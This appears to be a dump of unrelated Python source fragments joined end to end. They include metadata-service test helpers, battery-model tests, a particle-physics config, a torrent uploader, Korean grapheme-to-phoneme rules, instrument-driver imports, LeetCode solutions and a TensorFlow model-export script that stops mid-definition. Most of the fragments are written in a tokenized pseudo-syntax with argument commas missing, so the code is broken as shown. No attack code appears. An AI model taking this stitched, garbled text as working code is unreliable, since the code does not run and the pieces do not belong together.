        task_id=task.get("task_id"),
        task_name=task.get("task_name"),
        artifact={
            "name": "_task_ok",
            "location": "location",
            "ds_type": "ds_type",
            "sha": "sha",
            "type": "type",
            "content_type": "content_type",
            "attempt_id": attempt,
        })).body
    return _task


async def create_task(db, step=None, status="running", task_id=None, task_name=None, last_heartbeat_ts=None):
    """Creates and returns a task with specific status.
    Optionally creates the task for a specific step if provided."""
    if not step:
        _flow = (await add_flow(db, flow_id="HelloFlow")).body
        _run = (await add_run(db, flow_id=_flow.get("flow_id"))).body
        step = (await add_step(db, flow_id=_run.get("flow_id"), run_number=_run.get("run_number"), step_name="step")).body
    _task = (await add_task(
        db,
        flow_id=step.get("flow_id"),
        run_number=step.get("run_number"),
        step_name=step.get("step_name"),
        task_id=task_id,
        task_name=task_name,
        last_heartbeat_ts=last_heartbeat_ts)).body
    _task['status'] = status
    return _task


async def create_metadata_for_task(db, task, metadata=None, tags=None):
    "Creates a metadata record for a task"
    # Fixed: the default used to be the mutable literal `{}`, which is shared
    # across calls. None-sentinel keeps callers' behavior identical.
    if metadata is None:
        metadata = {}
    _meta = (await add_metadata(
        db,
        flow_id=task.get("flow_id"),
        run_number=task.get("run_number"),
        run_id=task.get("run_id"),
        step_name=task.get("step_name"),
        task_id=task.get("task_id"),
        task_name=task.get("task_name"),
        tags=tags,
        metadata=metadata)).body
    return _meta


async def create_task_attempt_metadata(db, task, attempt=0):
    "Create 'attempt' metadata for a task"
    return await create_metadata_for_task(db, task, metadata={
        "type": "attempt",
        "field_name": "attempt",
        "value": str(attempt),
    })


async def create_task_attempt_done_metadata(db, task, attempt: int = 0):
    "Create 'attempt-done' metadata for a task"
    return await create_metadata_for_task(db, task, metadata={
        "type": "attempt-done",
        "field_name": "attempt-done",
        "value": str(attempt),
    })


async def create_task_attempt_ok_metadata(db, task, attempt_id: int, attempt_ok: bool = False):
    "Create 'attempt_ok' metadata for a task"
    return await create_metadata_for_task(
        db, task,
        tags=["attempt_id:{attempt_id}".format(attempt_id=attempt_id)],
        metadata={
            "type": "internal_attempt_status",
            "field_name": "attempt_ok",
            "value": str(attempt_ok),
        })
# # Tests for the standard parameters # <import_stmt>pybamm<import_stmt>unittest<class_stmt>TestGeometricParameters(unittest.TestCase)<block_start><def_stmt>test_macroscale_parameters self<block_start>geo=pybamm.geometric_parameters<line_sep>L_n=geo.L_n<line_sep>L_s=geo.L_s<line_sep>L_p=geo.L_p<line_sep>L_x=geo.L_x<line_sep>l_n=geo.l_n<line_sep>l_s=geo.l_s<line_sep>l_p=geo.l_p<line_sep>parameter_values=pybamm.ParameterValues(values={"Negative electrode thickness [m]":0.05 "Separator thickness [m]":0.02 "Positive electrode thickness [m]":0.21 })<line_sep>L_n_eval=parameter_values.process_symbol(L_n)<line_sep>L_s_eval=parameter_values.process_symbol(L_s)<line_sep>L_p_eval=parameter_values.process_symbol(L_p)<line_sep>L_x_eval=parameter_values.process_symbol(L_x)<line_sep>self.assertEqual((L_n_eval+L_s_eval+L_p_eval).evaluate() L_x_eval.evaluate())<line_sep>l_n_eval=parameter_values.process_symbol(l_n)<line_sep>l_s_eval=parameter_values.process_symbol(l_s)<line_sep>l_p_eval=parameter_values.process_symbol(l_p)<line_sep>self.assertAlmostEqual((l_n_eval+l_s_eval+l_p_eval).evaluate() 1)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>print("Add -v for more debug output")<import_stmt>sys<if_stmt>"-v"<in>sys.argv<block_start>debug=<true><block_end>pybamm.settings.debug_mode=<true><line_sep>unittest.main()<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>L1TriggerConfig.DTTPGConfigProducers.L1DTTPGConfigFromDB_cff *<line_sep>dtTriggerPrimitiveDigis=cms.EDProducer("DTTrigProd" debug=cms.untracked.bool(<false>) # DT digis input tag digiTag=cms.InputTag("muonDTDigis") # Convert output into DTTF sector numbering: # false means [1-12] (useful for debug) # true is [0-11] useful as input for the DTTF emulator DTTFSectorNumbering=cms.bool(<true>) # config params for dumping of LUTs info from emulator lutBtic=cms.untracked.int32(31) lutDumpFlag=cms.untracked.bool(<false>))<line_sep>
# Reference: http://continuum.io/blog/the-python-and-the-complied-python #pythran export diffusePurePython(float [][], float [][], int) #runas import numpy as np;lx,ly=(2**7,2**7);u=np.zeros([lx,ly],dtype=np.double);u[int(lx/2),int(ly/2)]=1000.0;tempU=np.zeros([lx,ly],dtype=np.double);diffusePurePython(u,tempU,500) #bench import numpy as np;lx,ly=(2**6,2**6);u=np.zeros([lx,ly],dtype=np.double);u[int(lx/2),int(ly/2)]=1000.0;tempU=np.zeros([lx,ly],dtype=np.double);diffusePurePython(u,tempU,55) <import_stmt>numpy<as>np<def_stmt>diffusePurePython u tempU iterNum<block_start>""" Apply nested iteration for the Forward-Euler Approximation """<line_sep>mu=.1<line_sep>row=u.shape[0]<line_sep>col=u.shape[1]<for_stmt>n range(iterNum)<block_start><for_stmt>i range(1 row-1)<block_start><for_stmt>j range(1 col-1)<block_start>tempU[i j]=u[i j]+mu<times>(u[i+1 j]-2<times>u[i j]+u[i-1 j]+u[i j+1]-2<times>u[i j]+u[i j-1])<block_end><block_end><for_stmt>i range(1 row-1)<block_start><for_stmt>j range(1 col-1)<block_start>u[i j]=tempU[i j]<line_sep>tempU[i j]=0.0<block_end><block_end><block_end><block_end>
<import_stmt>asyncio<import_stmt>itertools<import_stmt>logging<import_stmt>random<import_stmt>time<import_from_stmt>typing List Iterable cast<import_from_stmt>torrent_client.algorithms.peer_manager PeerManager<import_from_stmt>torrent_client.models Peer TorrentInfo<import_from_stmt>torrent_client.utils humanize_size<class_stmt>Uploader<block_start><def_stmt>__init__ self torrent_info:TorrentInfo logger:logging.Logger peer_manager:PeerManager<block_start>self._download_info=torrent_info.download_info<line_sep>self._statistics=self._download_info.session_statistics<line_sep>self._logger=logger<line_sep>self._peer_manager=peer_manager<block_end>CHOKING_CHANGING_TIME=10<line_sep>UPLOAD_PEER_COUNT=4<line_sep>ITERS_PER_OPTIMISTIC_UNCHOKING=3<line_sep>CONNECTED_RECENTLY_THRESHOLD=60<line_sep>CONNECTED_RECENTLY_COEFF=3<def_stmt>_select_optimistically_unchoked self peers:Iterable[Peer]<arrow>Peer<block_start>cur_time=time.time()<line_sep>connected_recently=[]<line_sep>remaining_peers=[]<line_sep>peer_data=self._peer_manager.peer_data<for_stmt>peer peers<block_start><if_stmt>cur_time-peer_data[peer].connected_time<le>Uploader.CONNECTED_RECENTLY_THRESHOLD<block_start>connected_recently.append(peer)<block_end><else_stmt><block_start>remaining_peers.append(peer)<block_end><block_end>max_index=len(remaining_peers)+Uploader.CONNECTED_RECENTLY_COEFF<times>len(connected_recently)-1<line_sep>index=random.randint(0 max_index)<if_stmt>index<l>len(remaining_peers)<block_start><return>remaining_peers[index]<block_end><return>connected_recently[(index-len(remaining_peers))%len(connected_recently)]<block_end><def_stmt>get_peer_upload_rate self peer:Peer<arrow>int<block_start>data=self._peer_manager.peer_data[peer]<line_sep>rate=data.client.downloaded# We owe them for downloading <if_stmt>self._download_info.complete<block_start>rate<augadd>data.client.uploaded# To reach maximal upload speed <block_end><return>rate<block_end><async_keyword><def_stmt>execute 
self<block_start>prev_unchoked_peers=set()<line_sep>optimistically_unchoked=<none><for_stmt>i itertools.count()<block_start>peer_data=self._peer_manager.peer_data<line_sep>alive_peers=list(sorted(peer_data.keys() key=self.get_peer_upload_rate reverse=<true>))<line_sep>cur_unchoked_peers=set()<line_sep>interested_count=0<if_stmt>Uploader.UPLOAD_PEER_COUNT<block_start><if_stmt>i%Uploader.ITERS_PER_OPTIMISTIC_UNCHOKING<eq>0<block_start><if_stmt>alive_peers<block_start>optimistically_unchoked=self._select_optimistically_unchoked(alive_peers)<block_end><else_stmt><block_start>optimistically_unchoked=<none><block_end><block_end><if_stmt>optimistically_unchoked<is><not><none><and>optimistically_unchoked<in>peer_data<block_start>cur_unchoked_peers.add(optimistically_unchoked)<if_stmt>peer_data[optimistically_unchoked].client.peer_interested<block_start>interested_count<augadd>1<block_end><block_end><block_end><for_stmt>peer cast(List[Peer] alive_peers)<block_start><if_stmt>interested_count<eq>Uploader.UPLOAD_PEER_COUNT<block_start><break><block_end><if_stmt>peer_data[peer].client.peer_interested<block_start>interested_count<augadd>1<block_end>cur_unchoked_peers.add(peer)<block_end><for_stmt>peer prev_unchoked_peers-cur_unchoked_peers<block_start><if_stmt>peer<in>peer_data<block_start>peer_data[peer].client.am_choking=<true><block_end><block_end><for_stmt>peer cur_unchoked_peers<block_start>peer_data[peer].client.am_choking=<false><block_end>self._logger.debug('now %s peers are unchoked (total_uploaded = %s)' len(cur_unchoked_peers) humanize_size(self._statistics.total_uploaded))<line_sep><await>asyncio.sleep(Uploader.CHOKING_CHANGING_TIME)<line_sep>prev_unchoked_peers=cur_unchoked_peers<block_end><block_end><block_end>
<import_from_stmt>pylayers.antprop.aarray *<import_stmt>matplotlib.pyplot<as>plt<import_stmt>pdb<line_sep>print('--------------')<line_sep>print('antprop/test_subarray.py')<line_sep>print('--------------')<line_sep>fcGHz=60<line_sep>lamda=0.3/fcGHz<line_sep>N1=[4 4 1]<line_sep>N2=[2 2 1]<line_sep>dm1=[lamda/2. lamda/2. 0]<line_sep>dm2=[3<times>lamda 3<times>lamda 0]<line_sep>A1=AntArray(fGHz=np.array([fcGHz]) N=N1 dm=dm1 typant='Omni')<line_sep>A2=AntArray(fGHz=np.array([fcGHz]) N=N2 dm=dm2 array=A1)<line_sep>#A1.eval()
<import_from_stmt>..utils to_str<class_stmt>VertexCommand(object)<block_start><def_stmt>__init__ self command_text<block_start>self.command_text=command_text<block_end><def_stmt>__str__ self<block_start><return>to_str(self.__unicode__())<block_end><def_stmt>__unicode__ self<block_start><return>u'{}'.format(self.command_text)<block_end><block_end><class_stmt>CreateEdgeCommand(object)<block_start><def_stmt>__init__ self command_text<block_start>self.command_text=command_text<line_sep>self.retries=<none><block_end><def_stmt>__str__ self<block_start><return>to_str(self.__unicode__())<block_end><def_stmt>__unicode__ self<block_start><if_stmt>self.retries<block_start><return>u'{} RETRY {}'.format(self.command_text self.retries)<block_end><else_stmt><block_start><return>u'{}'.format(self.command_text)<block_end><block_end><def_stmt>retry self retries<block_start>self.retries=retries<line_sep><return>self<block_end><block_end>
# -*- coding: utf-8 -*- ''' Special rule for processing Hangul https://github.com/kyubyong/g2pK '''<import_stmt>re<import_from_stmt>g2pk.utils gloss get_rule_id2text<line_sep>rule_id2text=get_rule_id2text()<line_sep>############################ vowels ############################ <def_stmt>jyeo inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.1"]<line_sep># 일반적인 규칙으로 취급한다 by kyubyong out=re.sub("([ᄌᄍᄎ])ᅧ" r"\1ᅥ" inp)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>ye inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.2"]<line_sep># 실제로 언중은 예, 녜, 셰, 쎼 이외의 'ㅖ'는 [ㅔ]로 발음한다. by kyubyong <if_stmt>descriptive<block_start>out=re.sub("([ᄀᄁᄃᄄㄹᄆᄇᄈᄌᄍᄎᄏᄐᄑᄒ])ᅨ" r"\1ᅦ" inp)<block_end><else_stmt><block_start>out=inp<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>consonant_ui inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.3"]<line_sep>out=re.sub("([ᄀᄁᄂᄃᄄᄅᄆᄇᄈᄉᄊᄌᄍᄎᄏᄐᄑᄒ])ᅴ" r"\1ᅵ" inp)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>josa_ui inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.4.2"]<line_sep># 실제로 언중은 높은 확률로 조사 '의'는 [ㅔ]로 발음한다. 
<if_stmt>descriptive<block_start>out=re.sub("의/J" "에" inp)<block_end><else_stmt><block_start>out=inp.replace("/J" "")<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>vowel_ui inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.4.1"]<line_sep># 실제로 언중은 높은 확률로 단어의 첫음절 이외의 '의'는 [ㅣ]로 발음한다.""" <if_stmt>descriptive<block_start>out=re.sub("(\Sᄋ)ᅴ" r"\1ᅵ" inp)<block_end><else_stmt><block_start>out=inp<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>jamo inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["16"]<line_sep>out=inp<line_sep>out=re.sub("([그])ᆮᄋ" r"\1ᄉ" out)<line_sep>out=re.sub("([으])[ᆽᆾᇀᇂ]ᄋ" r"\1ᄉ" out)<line_sep>out=re.sub("([으])[ᆿ]ᄋ" r"\1ᄀ" out)<line_sep>out=re.sub("([으])[ᇁ]ᄋ" r"\1ᄇ" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<line_sep>############################ 어간 받침 ############################ <block_end><def_stmt>rieulgiyeok inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["11.1"]<line_sep>out=inp<line_sep>out=re.sub("ᆰ/P([ᄀᄁ])" r"ᆯᄁ" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>rieulbieub inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["25"]<line_sep>out=inp<line_sep>out=re.sub("([ᆲᆴ])/Pᄀ" r"\1ᄁ" out)<line_sep>out=re.sub("([ᆲᆴ])/Pᄃ" r"\1ᄄ" out)<line_sep>out=re.sub("([ᆲᆴ])/Pᄉ" r"\1ᄊ" out)<line_sep>out=re.sub("([ᆲᆴ])/Pᄌ" r"\1ᄍ" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>verb_nieun inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["24"]<line_sep>out=inp<line_sep>pairs=[("([ᆫᆷ])/Pᄀ" r"\1ᄁ") ("([ᆫᆷ])/Pᄃ" r"\1ᄄ") ("([ᆫᆷ])/Pᄉ" r"\1ᄊ") ("([ᆫᆷ])/Pᄌ" r"\1ᄍ") ("ᆬ/Pᄀ" "ᆫᄁ") ("ᆬ/Pᄃ" "ᆫᄄ") ("ᆬ/Pᄉ" "ᆫᄊ") ("ᆬ/Pᄌ" "ᆫᄍ") ("ᆱ/Pᄀ" "ᆷᄁ") ("ᆱ/Pᄃ" "ᆷᄄ") ("ᆱ/Pᄉ" "ᆷᄊ") ("ᆱ/Pᄌ" "ᆷᄍ")]<for_stmt>str1,str2 pairs<block_start>out=re.sub(str1 str2 out)<block_end>gloss(verbose out inp 
rule)<line_sep><return>out<block_end><def_stmt>balb inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["10.1"]<line_sep>out=inp<line_sep>syllable_final_or_consonants="($|[^ᄋᄒ])"<line_sep># exceptions out=re.sub(f"(바)ᆲ({syllable_final_or_consonants})" r"\1ᆸ\2" out)<line_sep>out=re.sub(f"(너)ᆲ([ᄌᄍ]ᅮ|[ᄃᄄ]ᅮ)" r"\1ᆸ\2" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>palatalize inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["17"]<line_sep>out=inp<line_sep>out=re.sub("ᆮᄋ([ᅵᅧ])" r"ᄌ\1" out)<line_sep>out=re.sub("ᇀᄋ([ᅵᅧ])" r"ᄎ\1" out)<line_sep>out=re.sub("ᆴᄋ([ᅵᅧ])" r"ᆯᄎ\1" out)<line_sep>out=re.sub("ᆮᄒ([ᅵ])" r"ᄎ\1" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>modifying_rieul inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["27"]<line_sep>out=inp<line_sep>pairs=[("ᆯ/E ᄀ" r"ᆯ ᄁ") ("ᆯ/E ᄃ" r"ᆯ ᄄ") ("ᆯ/E ᄇ" r"ᆯ ᄈ") ("ᆯ/E ᄉ" r"ᆯ ᄊ") ("ᆯ/E ᄌ" r"ᆯ ᄍ") ("ᆯ걸" "ᆯ껄") ("ᆯ밖에" "ᆯ빠께") ("ᆯ세라" "ᆯ쎄라") ("ᆯ수록" "ᆯ쑤록") ("ᆯ지라도" "ᆯ찌라도") ("ᆯ지언정" "ᆯ찌언정") ("ᆯ진대" "ᆯ찐대")]<for_stmt>str1,str2 pairs<block_start>out=re.sub(str1 str2 out)<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end>
""" Python Interchangeable Virtual Instrument Library Copyright (c) 2012-2017 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
"""<line_sep># Oscilloscopes # DPO4000 <import_from_stmt>.tektronixDPO4032 tektronixDPO4032<import_from_stmt>.tektronixDPO4034 tektronixDPO4034<import_from_stmt>.tektronixDPO4054 tektronixDPO4054<import_from_stmt>.tektronixDPO4104 tektronixDPO4104<line_sep># MSO4000 <import_from_stmt>.tektronixMSO4032 tektronixMSO4032<import_from_stmt>.tektronixMSO4034 tektronixMSO4034<import_from_stmt>.tektronixMSO4054 tektronixMSO4054<import_from_stmt>.tektronixMSO4104 tektronixMSO4104<line_sep># DPO4000B <import_from_stmt>.tektronixDPO4014B tektronixDPO4014B<import_from_stmt>.tektronixDPO4034B tektronixDPO4034B<import_from_stmt>.tektronixDPO4054B tektronixDPO4054B<import_from_stmt>.tektronixDPO4102B tektronixDPO4102B<import_from_stmt>.tektronixDPO4104B tektronixDPO4104B<line_sep># MSO4000B <import_from_stmt>.tektronixMSO4014B tektronixMSO4014B<import_from_stmt>.tektronixMSO4034B tektronixMSO4034B<import_from_stmt>.tektronixMSO4054B tektronixMSO4054B<import_from_stmt>.tektronixMSO4102B tektronixMSO4102B<import_from_stmt>.tektronixMSO4104B tektronixMSO4104B<line_sep># MDO4000 <import_from_stmt>.tektronixMDO4054 tektronixMDO4054<import_from_stmt>.tektronixMDO4104 tektronixMDO4104<line_sep># MDO4000B <import_from_stmt>.tektronixMDO4014B tektronixMDO4014B<import_from_stmt>.tektronixMDO4034B tektronixMDO4034B<import_from_stmt>.tektronixMDO4054B tektronixMDO4054B<import_from_stmt>.tektronixMDO4104B tektronixMDO4104B<line_sep># MDO3000 <import_from_stmt>.tektronixMDO3012 tektronixMDO3012<import_from_stmt>.tektronixMDO3014 tektronixMDO3014<import_from_stmt>.tektronixMDO3022 tektronixMDO3022<import_from_stmt>.tektronixMDO3024 tektronixMDO3024<import_from_stmt>.tektronixMDO3032 tektronixMDO3032<import_from_stmt>.tektronixMDO3034 tektronixMDO3034<import_from_stmt>.tektronixMDO3052 tektronixMDO3052<import_from_stmt>.tektronixMDO3054 tektronixMDO3054<import_from_stmt>.tektronixMDO3102 tektronixMDO3102<import_from_stmt>.tektronixMDO3104 tektronixMDO3104<line_sep># Function Generators 
<import_from_stmt>.tektronixAWG2005 tektronixAWG2005<import_from_stmt>.tektronixAWG2020 tektronixAWG2020<import_from_stmt>.tektronixAWG2021 tektronixAWG2021<import_from_stmt>.tektronixAWG2040 tektronixAWG2040<import_from_stmt>.tektronixAWG2041 tektronixAWG2041<line_sep># Power Supplies <import_from_stmt>.tektronixPS2520G tektronixPS2520G<import_from_stmt>.tektronixPS2521G tektronixPS2521G<line_sep># Optical attenuators <import_from_stmt>.tektronixOA5002 tektronixOA5002<import_from_stmt>.tektronixOA5012 tektronixOA5012<import_from_stmt>.tektronixOA5022 tektronixOA5022<import_from_stmt>.tektronixOA5032 tektronixOA5032<line_sep># Current probe amplifiers <import_from_stmt>.tektronixAM5030 tektronixAM5030<line_sep>
<import_stmt>os<import_stmt>re<import_stmt>fnmatch<import_from_stmt>logfetch_base log is_in_date_range<import_from_stmt>termcolor colored<def_stmt>find_cached_logs args<block_start>matching_logs=[]<line_sep>log_fn_match=get_matcher(args)<for_stmt>filename os.listdir(args.dest)<block_start><if_stmt>fnmatch.fnmatch(filename log_fn_match)<and>in_date_range(args filename)<block_start>log(colored('Including log {0}\n'.format(filename) 'blue') args <true>)<line_sep>matching_logs.append('{0}/{1}'.format(args.dest filename))<block_end><else_stmt><block_start>log(colored('Excluding log {0}, not in date range\n'.format(filename) 'magenta') args <true>)<block_end><block_end><return>matching_logs<block_end><def_stmt>in_date_range args filename<block_start>timestamps=re.findall(r"-\d{13}-" filename)<if_stmt>timestamps<block_start><return>is_in_date_range(args int(str(timestamps[-1]).replace("-" "")[0:-3]))<block_end><else_stmt><block_start><return><true><block_end><block_end><def_stmt>get_matcher args<block_start><if_stmt>args.taskId<block_start><if_stmt>'filename'<in>args.file_pattern<and>args.logtype<block_start><return>'{0}*{1}*'.format(args.taskId args.logtype)<block_end><else_stmt><block_start><return>'{0}*'.format(args.taskId)<block_end><block_end><elif_stmt>args.deployId<and>args.requestId<block_start><if_stmt>'filename'<in>args.file_pattern<and>args.logtype<block_start><return>'{0}-{1}*{2}*'.format(args.requestId args.deployId args.logtype)<block_end><else_stmt><block_start><return>'{0}-{1}*'.format(args.requestId args.deployId)<block_end><block_end><else_stmt><block_start><if_stmt>'filename'<in>args.file_pattern<and>args.logtype<block_start><return>'{0}*{1}*'.format(args.requestId args.logtype)<block_end><else_stmt><block_start><return>'{0}*'.format(args.requestId)<block_end><block_end><block_end>
# 执行用时 : 348 ms # 内存消耗 : 13 MB # 方案:哈希表 <class_stmt>Solution(object)<block_start><def_stmt>twoSum self nums target<block_start>""" :type nums: List[int] :type target: int :rtype: List[int] """<line_sep># 创建哈希表{value:idx} record={}<line_sep># 遍数组 <for_stmt>idx,value enumerate(nums)# 如果差值在哈希表中,返回对应索引 以及 循环中本次idx # 如果差值不在,则在哈希表中插入该value:idx <block_start><if_stmt>(target-value)<in>record.keys()<block_start><return>[record[target-value] idx]<block_end><else_stmt><block_start>record[value]=idx<block_end><block_end><block_end><block_end>
<def_stmt>test_socfaker_application_status socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.status<in>['Active' 'Inactive' 'Legacy']<block_end><def_stmt>test_socfaker_application_account_status socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.account_status<in>['Enabled' 'Disabled']<block_end><def_stmt>test_socfaker_name socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.name<block_end><def_stmt>test_socfaker_application_logon_timestamp socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.logon_timestamp<block_end>
""" You are given an integer array nums and an integer k. In one operation, you can pick two numbers from the array whose sum equals k and remove them from the array. Return the maximum number of operations you can perform on the array.   Example 1: Input: nums = [1,2,3,4], k = 5 Output: 2 Explanation: Starting with nums = [1,2,3,4]: - Remove numbers 1 and 4, then nums = [2,3] - Remove numbers 2 and 3, then nums = [] There are no more pairs that sum up to 5, hence a total of 2 operations. Example 2: Input: nums = [3,1,3,4,3], k = 6 Output: 1 Explanation: Starting with nums = [3,1,3,4,3]: - Remove the first two 3's, then nums = [1,4,3] There are no more pairs that sum up to 6, hence a total of 1 operation.   Constraints: 1 <= nums.length <= 105 1 <= nums[i] <= 109 1 <= k <= 109 """<class_stmt>Solution<block_start><def_stmt>maxOperations self nums:List[int] k:int<arrow>int<block_start>c=collections.Counter(nums)<line_sep>r=0<for_stmt>n,v c.items()<block_start>t=k-n<if_stmt>t<not><in>c<block_start><continue><block_end><if_stmt>t<eq>n<block_start>m=v<floordiv>2<line_sep>r<augadd>m<line_sep>c[n]=v-m<line_sep><continue><block_end>m=min(v c[t])<line_sep>r<augadd>m<line_sep>c[n]=v-m<line_sep>c[t]=c[t]-m<block_end><return>r<block_end><block_end>
<import_from_future_stmt> absolute_import division print_function unicode_literals <import_from_stmt>operator itemgetter<def_stmt>fixdate ds<block_start>dmy=ds.split('/')<line_sep># BUG (!?): don't understand but stolen from ubs-ch-fr.py <return>'.'.join((dmy[1] dmy[0] dmy[2]))<block_end>mapping={'has_header':<true> 'date':<lambda>tr:fixdate(tr['Date']) 'amount':itemgetter('Amount (GBP)') 'desc':itemgetter('Reference') 'payee':itemgetter('Counter Party')}<line_sep>
<class_stmt>InterfaceWriter(object)<block_start><def_stmt>__init__ self output_path<block_start>self._output_path_template=output_path+'/_{key}_{subsystem}.i'<line_sep>self._fp={'pre':{} 'post':{} }<block_end><def_stmt>_write self key subsystem text<block_start>subsystem=subsystem.lower()<line_sep>fp=self._fp[key].get(subsystem)<if_stmt>fp<is><none><block_start>self._fp[key][subsystem]=fp=open(self._output_path_template.format(key=key subsystem=subsystem) 'w+')<block_end>fp.write(text)<line_sep>fp.write('\n')<block_end><def_stmt>write_pre self subsystem text<block_start>self._write('pre' subsystem text)<block_end><def_stmt>write_post self subsystem text<block_start>self._write('post' subsystem text)<block_end><def_stmt>close self<block_start><for_stmt>fp_map self._fp.values()<block_start><for_stmt>fp fp_map.values()<block_start>fp.close()<block_end><block_end><block_end><block_end>
<import_stmt>os<import_stmt>argparse<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow.python.platform gfile<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.tools strip_unused_lib<line_sep>tf.enable_eager_execution()<line_sep>parser=argparse.ArgumentParser()<line_sep># export types parser.add_argument("--coreml" action="store_true")<line_sep>parser.add_argument("--tflite" action="store_true")<line_sep>parser.add_argument("--tfjs" action="store_true")<line_sep>parser.add_argument("--model-type" type=str)<line_sep># import paths parser.add_argument("--saved-model" type=str)<line_sep># export paths parser.add_argument("--mlmodel-path" type=str)<line_sep>parser.add_argument("--tflite-path" type=str)<line_sep>parser.add_argument("--tfjs-path" type=str)<line_sep>args=parser.parse_args()<def_stmt>print_header msg<block_start>print(" "<times>80)<line_sep>print("_"<times>80)<line_sep>print(msg)<block_end><def_stmt>print_footer msg<block_start>print(msg)<line_sep>print("_"<times>80)<line_sep>print(" "<times>80)<block_end><def_stmt>attempt_conversion model_type model_format<block_start><def_stmt>attempt_conversion convert<block_start><try_stmt><block_start>print_header(f"Converting {model_type} model to {model_format}")<line_sep>convert()<line_sep>print_footer(f"Successfully converted to {model_format}")<block_end><except_stmt>Exception<as>e<block_start>print(e)<line_sep>print_footer(f"Unable to convert to {model_format}")<block_end><block_end><return>attempt_conversion<block_end><def_stmt>get_anchors graph<block_start>""" Computes the list of anchor boxes by sending a fake image through the graph. Outputs an array of size (4, num_anchors) where each element is an anchor box given as [ycenter, xcenter, height, width] in normalized coordinates. 
"""<with_stmt>tf.Session(graph=graph)<as>sess<block_start>anchors_tensor="Concatenate/concat:0"<line_sep>image_tensor=graph.get_tensor_by_name("image_tensor:0")<line_sep>box_corners_tensor=graph.get_tensor_by_name(anchors_tensor)<line_sep>box_corners=sess.run(box_corners_tensor feed_dict={image_tensor:np.zeros((1 300 300 3))})<line_sep># The TensorFlow graph gives each anchor box as [ymin, xmin, ymax, xmax]. # Convert these min/max values to a center coordinate, width and height. ymin,xmin,ymax,xmax=np.transpose(box_corners)<line_sep>width=xmax-xmin<line_sep>height=ymax-ymin<line_sep>ycenter=ymin+height/2.0<line_sep>xcenter=xmin+width/2.0<line_sep><return>np.stack([ycenter xcenter height width])<block_end><block_end><def_stmt>strip_and_freeze_model saved_model output_path input_node_names=[] output_node_names=[]<block_start>graph=tf.Graph()<with_stmt>tf.Session(graph=graph)<as>sess<block_start>print("loading model...")<line_sep>tf.saved_model.loader.load(sess [tf.saved_model.SERVING] saved_model)<line_sep>print("stripping unused ops...")<line_sep>gdef=strip_unused_lib.strip_unused(input_graph_def=tf.get_default_graph().as_graph_def() input_node_names=input_node_names output_node_names=output_node_names placeholder_type_enum=dtypes.float32.as_datatype_enum )<line_sep>gdef=tf.graph_util.convert_variables_to_constants(sess gdef output_node_names)<with_stmt>gfile.GFile(output_path "wb")<as>f<block_start>print("writing frozen model...")<line_sep>f.write(gdef.SerializeToString())<block_end><block_end><return>graph<block_end>os.makedirs(".tmp" exist_ok=<true>)<line_sep>################################################################################ # Object Detection ################################################################################ <if_stmt>args.model_type<eq>"localization"<block_start>labels_path=os.path.join(args.saved_model "labels.json")<line_sep>@attempt_conversion("object detection" "Core ML")<def_stmt>convert_object_detection_coreml 
